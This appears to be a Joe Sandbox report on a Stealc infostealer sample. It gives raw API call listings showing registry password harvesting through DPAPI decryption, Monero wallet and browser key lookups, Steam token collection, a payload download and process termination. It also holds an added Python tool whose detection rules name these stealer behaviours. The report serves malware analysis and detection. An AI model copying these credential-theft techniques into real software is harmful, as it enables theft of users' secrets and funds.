                                  • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 356768136-3434357891
                                  • Opcode ID: cfa0ae5499b3d3de2532bec964c5cb7de331f6248741ffb7ac8abb6171e59a54
                                  • Instruction ID: 8d60cdf10aa7e793be75d1c42b282fbdb76b181a237692f2e057acb14ed787c2
                                  • Opcode Fuzzy Hash: cfa0ae5499b3d3de2532bec964c5cb7de331f6248741ffb7ac8abb6171e59a54
                                  • Instruction Fuzzy Hash: 507141B1D1021DAFDB10DF95CCC0AEEB7B8EF49340F14456AE609A7240EB75AA85CF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B1135
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B113C
                                  • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 002B1159
                                  • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 002B1173
                                  • RegCloseKey.ADVAPI32(?), ref: 002B117D
                                  Strings
                                  • wallet_path, xrefs: 002B116D
                                  • SOFTWARE\monero-project\monero-core, xrefs: 002B114F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                  • API String ID: 3225020163-4244082812
                                  • Opcode ID: 09e8716a124b706853d55838ff687f35803d993b77a10a468837c8c9c59eb74c
                                  • Instruction ID: 7d804b858e9072bff3d6682c9e4b5d345b42b7fa106c75ba1eae694aa62b8404
                                  • Opcode Fuzzy Hash: 09e8716a124b706853d55838ff687f35803d993b77a10a468837c8c9c59eb74c
                                  • Instruction Fuzzy Hash: FDF09675A40348BBD7109BE19C8DFEA7B7CDB04715F000064FE09E6281D6705D5487A4
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 002B9E04
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 002B9E42
                                  • LocalAlloc.KERNEL32(00000040), ref: 002B9EA7
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  • lstrcpy.KERNEL32(00000000,002E4C48), ref: 002B9FB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpymemcmp$AllocLocal
                                  • String ID: @$v10$v20
                                  • API String ID: 102826412-278772428
                                  • Opcode ID: c8e52bb275d329ca6512ff5539c43c037f46b68cbd6958fb26ce8b2115e953e3
                                  • Instruction ID: 7ca948c2b6d984c053fb3d1abcfb34d483bbab7e3b371c52e4bc9e5a17428758
                                  • Opcode Fuzzy Hash: c8e52bb275d329ca6512ff5539c43c037f46b68cbd6958fb26ce8b2115e953e3
                                  • Instruction Fuzzy Hash: A351B031A302499BDB10EF65DC85BEE77A8EF003A4F254065FA49EB241DB70ED648BD0
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002B565A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B5661
                                  • InternetOpenA.WININET(002DCFEC,00000000,00000000,00000000,00000000), ref: 002B5677
                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 002B5692
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 002B56BC
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 002B56E1
                                  • InternetCloseHandle.WININET(?), ref: 002B56FA
                                  • InternetCloseHandle.WININET(00000000), ref: 002B5701
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: d8058ae3d26eed7031e8db5f333a71d88e28c066a5698ea194b3b6b724cdedf2
                                  • Instruction ID: b94ce2bad10ec62b9b72e0d09d9f509aa451c72bbe20082da2df8a83b2b69ae4
                                  • Opcode Fuzzy Hash: d8058ae3d26eed7031e8db5f333a71d88e28c066a5698ea194b3b6b724cdedf2
                                  • Instruction Fuzzy Hash: 15418D70A10216EFDB24CF55DD88BEAB7B8FF48350F1480A9E9089F291E7719D42CB94
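                                   The listings on this page give Stealc's behaviours only as raw API sequences with hex constants: the HKCU value sweep at 002B77D0 that StrStrA-matches "Password" and hands each hit to CryptUnprotectData in subcall 002B7750, the monero-core wallet_path probe at 002B1135, the InternetOpenUrlA download into a heap buffer at 002B565A above, and the Toolhelp32 termination loop at 002D4759 listed below. The following Python tool is an added example for this report (it is not Joe Sandbox code and not code recovered from the sample): it parses these "APIs" lines, decodes the constants a reader otherwise has to look up by hand (0x80000001 is HKEY_CURRENT_USER, 0x20019 is KEY_READ and 0x20119 adds KEY_WOW64_64KEY, 0x04000100 is INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_NO_CACHE_WRITE, OpenProcess access 0x1 is PROCESS_TERMINATE, CryptUnprotectData flag 0x1 is CRYPTPROTECT_UI_FORBIDDEN), and flags the four behaviours as ordered API subsequences. The behaviour names and rule set are mine; the sample listing lines are copied from this report, trimmed to the calls each rule needs.

```python
"""Parse this report's "APIs" listings, decode constants, flag stealer API sequences. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# "• Api.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function ADDR:".
LINE_RE = re.compile(r"^\s*•\s*(?:Part of subcall function\s+([0-9A-Fa-f]+):\s*)?"
                     r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    api: str
    args: list                        # 8-hex-digit args become int; "?" and literals stay str
    ref: int                          # call-site address
    subcall_of: Optional[str] = None  # callee address for "Part of subcall" lines

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        sub, api, _mod, argstr, ref = m.groups()
        args = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else a
                for a in map(str.strip, argstr.split(","))] if argstr else []
        calls.append(ApiCall(api, args, int(ref, 16), sub))
    return calls

REG_HIVES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}  # Windows SDK values
KEY_FLAGS = [(0x20019, "KEY_READ"), (0x100, "KEY_WOW64_64KEY"), (0x2, "KEY_SET_VALUE")]  # composites first
PROCESS_FLAGS = [(0x1, "PROCESS_TERMINATE"), (0x10, "PROCESS_VM_READ"), (0x400, "PROCESS_QUERY_INFORMATION")]
INET_FLAGS = [(0x100, "INTERNET_FLAG_PRAGMA_NOCACHE"), (0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE")]

def decode_flags(value: int, table: List[Tuple[int, str]]) -> List[str]:
    names, rest = [], value
    for bits, name in table:
        if rest & bits == bits:
            names.append(name)
            rest &= ~bits
    return names + ([hex(rest)] if rest else [])  # unknown leftover bits stay visible

ARG_DECODERS: Dict[Tuple[str, int], Callable[[int], str]] = {  # (API, arg index) -> decoder
    ("RegOpenKeyExA", 0): lambda v: REG_HIVES.get(v, hex(v)),
    ("RegOpenKeyExA", 3): lambda v: "|".join(decode_flags(v, KEY_FLAGS)),
    ("OpenProcess", 0): lambda v: "|".join(decode_flags(v, PROCESS_FLAGS)),
    ("InternetOpenUrlA", 4): lambda v: "|".join(decode_flags(v, INET_FLAGS)),
    ("CryptUnprotectData", 5): lambda v: "CRYPTPROTECT_UI_FORBIDDEN" if v & 1 else hex(v),
}
def describe(c: ApiCall) -> str:
    shown = [ARG_DECODERS[(c.api, i)](a) if isinstance(a, int) and (c.api, i) in ARG_DECODERS
             else str(a) for i, a in enumerate(c.args)]
    return f"{c.api}({', '.join(shown)}) @ {c.ref:08X}"

def _has_str(c: ApiCall, needle: str) -> bool:
    return any(isinstance(a, str) and needle in a.lower() for a in c.args)
def _bit(c: ApiCall, i: int, mask: int) -> bool:
    return any(isinstance(a, int) and a & mask for a in c.args[i:i + 1])

RULES: Dict[str, list] = {  # behaviour -> in-order API subsequence, each with an optional predicate
    "dpapi_registry_credential_harvest": [("RegOpenKeyExA", lambda c: c.args[:1] == [0x80000001]),
        ("RegEnumValueA", None), ("StrStrA", lambda c: _has_str(c, "password")), ("CryptUnprotectData", None)],
    "download_to_heap": [("InternetOpenA", None), ("InternetOpenUrlA", None), ("InternetReadFile", None), ("memcpy", None)],
    "toolhelp_process_kill_loop": [("CreateToolhelp32Snapshot", lambda c: _bit(c, 0, 0x2)),
        ("Process32First", None), ("OpenProcess", lambda c: _bit(c, 0, 0x1)), ("TerminateProcess", None)],
    "crypto_wallet_registry_probe": [("RegOpenKeyExA", lambda c: _has_str(c, "monero")),
        ("RegQueryValueExA", lambda c: _has_str(c, "wallet"))],
}

def match_rule(calls: List[ApiCall], rule: list) -> Optional[List[int]]:
    refs, pos = [], 0  # greedy in-order subsequence match over the listing
    for api, pred in rule:
        while pos < len(calls) and not (calls[pos].api == api and (pred is None or pred(calls[pos]))):
            pos += 1
        if pos == len(calls):
            return None
        refs.append(calls[pos].ref)
        pos += 1
    return refs

def analyze(text: str) -> Dict[str, List[int]]:
    calls = parse_api_lines(text)
    return {n: r for n, r in ((n, match_rule(calls, rule)) for n, rule in RULES.items()) if r}

SAMPLE_LISTINGS = {  # API lines copied from this report's listings, trimmed to the calls of interest
    "002B77D0 credential sweep": r"""• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002B7805
• RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 002B784A
• StrStrA.SHLWAPI(?,Password), ref: 002B78B8
  • Part of subcall function 002B7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002B778D""",
    "002B1135 monero wallet probe": r"""• RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 002B1159
• RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 002B1173""",
    "002B565A download to heap": r"""• InternetOpenA.WININET(002DCFEC,00000000,00000000,00000000,00000000), ref: 002B5677
• InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 002B5692
• InternetReadFile.WININET(?,?,00000400,00000001), ref: 002B56BC
• memcpy.MSVCRT(00000000,?,00000001), ref: 002B56E1""",
    "002D4759 process kill loop": r"""• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 002D4759
• Process32First.KERNEL32(00000000,00000128), ref: 002D4769
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 002D479C
• TerminateProcess.KERNEL32(00000000,00000000), ref: 002D47AB""",
}

if __name__ == "__main__":
    for label, text in SAMPLE_LISTINGS.items():
        print(label, *map(describe, parse_api_lines(text)), f"FLAGS: {analyze(text)}", sep="\n  ")
```

                                   The rules match in listing order, so a function that only enumerates registry values without the StrStrA/CryptUnprotectData tail is not flagged, and the predicates keep a RegOpenKeyExA against HKLM or an OpenProcess without PROCESS_TERMINATE from matching. Paste any other "APIs" block from this report into analyze() to see which, if any, of the four behaviours it contains; extending RULES with a new tuple list is all that is needed for further sequences.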
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 002D4759
                                  • Process32First.KERNEL32(00000000,00000128), ref: 002D4769
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D477B
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002D479C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 002D47AB
                                  • CloseHandle.KERNEL32(00000000), ref: 002D47B2
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D47C0
                                  • CloseHandle.KERNEL32(00000000), ref: 002D47CB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 24b7ad84d190fe391d535b01d8bc1f580affa2d5a24dec3c62f4471ebde82313
                                  • Instruction ID: c6492e740192f46defc9ac816c022b68d91793b3ecb1e06f79470d513557d9e7
                                  • Opcode Fuzzy Hash: 24b7ad84d190fe391d535b01d8bc1f580affa2d5a24dec3c62f4471ebde82313
                                  • Instruction Fuzzy Hash: 7301B9715012156BFB20AF609CC9FEAB77CEB48751F0001A5F909D51C2DF708D908A64
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C8435
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C846C
                                  • lstrlen.KERNEL32(00000000), ref: 002C84B2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C84E9
                                  • lstrlen.KERNEL32(00000000), ref: 002C84FF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C852E
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002C853E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 0435268c9f45d078f1cd1e6ca3408b79acc25fde7d63dbf6bc366891dabb3ecc
                                  • Instruction ID: 31b318006b075f83963d44d7922f82b62e32f41688443beb1bbd9856a025b8c3
                                  • Opcode Fuzzy Hash: 0435268c9f45d078f1cd1e6ca3408b79acc25fde7d63dbf6bc366891dabb3ecc
                                  • Instruction Fuzzy Hash: A0517D715202029FDB24DF68D884E9AB7F9EF48340F25C56DEC86EB345EB70E9518B50
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 002D2925
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D292C
                                  • RegOpenKeyExA.ADVAPI32(80000002,011BC048,00000000,00020119,002D28A9), ref: 002D294B
                                  • RegQueryValueExA.ADVAPI32(002D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 002D2965
                                  • RegCloseKey.ADVAPI32(002D28A9), ref: 002D296F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: a75ae0d470a01a0bb4aaa3a23b2c58a3dfdd4b69c516aef551dcce4fa9110f0e
                                  • Instruction ID: 5a0819e95cbf3e185c6c057bd96b47316117af01ce6875e4b01910291faee892
                                  • Opcode Fuzzy Hash: a75ae0d470a01a0bb4aaa3a23b2c58a3dfdd4b69c516aef551dcce4fa9110f0e
                                  • Instruction Fuzzy Hash: 8D01B575500295ABD720CFA0DC99EEB7BBCEB49715F200069FE459B281E6315D188794
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 002D2895
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D289C
                                    • Part of subcall function 002D2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 002D2925
                                    • Part of subcall function 002D2910: RtlAllocateHeap.NTDLL(00000000), ref: 002D292C
                                    • Part of subcall function 002D2910: RegOpenKeyExA.ADVAPI32(80000002,011BC048,00000000,00020119,002D28A9), ref: 002D294B
                                    • Part of subcall function 002D2910: RegQueryValueExA.ADVAPI32(002D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 002D2965
                                    • Part of subcall function 002D2910: RegCloseKey.ADVAPI32(002D28A9), ref: 002D296F
                                  • RegOpenKeyExA.ADVAPI32(80000002,011BC048,00000000,00020119,002C9500), ref: 002D28D1
                                  • RegQueryValueExA.ADVAPI32(002C9500,011CE070,00000000,00000000,00000000,000000FF), ref: 002D28EC
                                  • RegCloseKey.ADVAPI32(002C9500), ref: 002D28F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: b9c91da0670a8e6a88b61541a55453d2c3a2b512248f9e9bb9c9159e7c938759
                                  • Instruction ID: cb50d89b517c853df122e287b6d845c7d02c2959fe1113b31968aafc21545c27
                                  • Opcode Fuzzy Hash: b9c91da0670a8e6a88b61541a55453d2c3a2b512248f9e9bb9c9159e7c938759
                                  • Instruction Fuzzy Hash: BF01A271A50258BFDB20DBA4EC89FAA777CEB44315F1001A9FE08DA392DA705D5487A4
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 002B723E
                                  • GetProcessHeap.KERNEL32(00000008,00000010), ref: 002B7279
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7280
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 002B72C3
                                  • HeapFree.KERNEL32(00000000), ref: 002B72CA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 002B7329
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                  • String ID:
                                  • API String ID: 174687898-0
                                  • Opcode ID: 80b2fa7a7d2f0d81c6844a39940e65c7f3e0ef74f45b03522d0e55f869612060
                                  • Instruction ID: 4111702e421522198393cf87c86b4664d6c9eb7b478ab826edbf93c65058edbd
                                  • Opcode Fuzzy Hash: 80b2fa7a7d2f0d81c6844a39940e65c7f3e0ef74f45b03522d0e55f869612060
                                  • Instruction Fuzzy Hash: 82418C71B156069BEB20CF69DC84BEAB3E8FB88345F1445A9EC4DCB341E631ED209B50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 002B9CA8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 002B9CDA
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 002B9D03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocallstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2746078483-738592651
                                  • Opcode ID: 20ceee606b337dc0874ae50474ba2af1aba86ac94d0ccaa71163eb7b1385448d
                                  • Instruction ID: 3c71fe2b611cfb2452f8c0e67750c47047ff78f1c0189b6b92477f314d4dfd85
                                  • Opcode Fuzzy Hash: 20ceee606b337dc0874ae50474ba2af1aba86ac94d0ccaa71163eb7b1385448d
                                  • Instruction Fuzzy Hash: B741F231A2020B9BDF21FF65DC816EEB7B4EF45784F144065EA55AB252DA30ED64CB80
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CEA24
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CEA53
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CEA61
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CEA7A
                                  • lstrcat.KERNEL32(?,011C92A8), ref: 002CEA8D
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CEA9F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 9ade6e26855480d3bca93d4e56d25a5b1f0670135f619d2f8ec2831fa1873704
                                  • Instruction ID: 7959179e09e633e394de91ed28a63e83f43dbcb69cb54a9661beee2e453b8dbe
                                  • Opcode Fuzzy Hash: 9ade6e26855480d3bca93d4e56d25a5b1f0670135f619d2f8ec2831fa1873704
                                  • Instruction Fuzzy Hash: CD41A771920259EFCB55EF64DC82FED7378BF88300F514468BA1AAB281DE709E588F54
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CECDF
                                  • lstrlen.KERNEL32(00000000), ref: 002CECF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CED1D
                                  • lstrlen.KERNEL32(00000000), ref: 002CED24
                                  • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 002CED52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: steam_tokens.txt
                                  • API String ID: 367037083-401951677
                                  • Opcode ID: 8e7cb01f7c77cc013313806eec36628f0600050b091a193df62acc875c39bff6
                                  • Instruction ID: 9a024f488d8e5efd1ee49a2079f21b5358eb32cffdca38299e303852ff8c39b8
                                  • Opcode Fuzzy Hash: 8e7cb01f7c77cc013313806eec36628f0600050b091a193df62acc875c39bff6
                                  • Instruction Fuzzy Hash: ED319531A306569BCB21BF78EC4AA9E7768AF00340F254175F886DB252DB30DD298BD1
                                  APIs
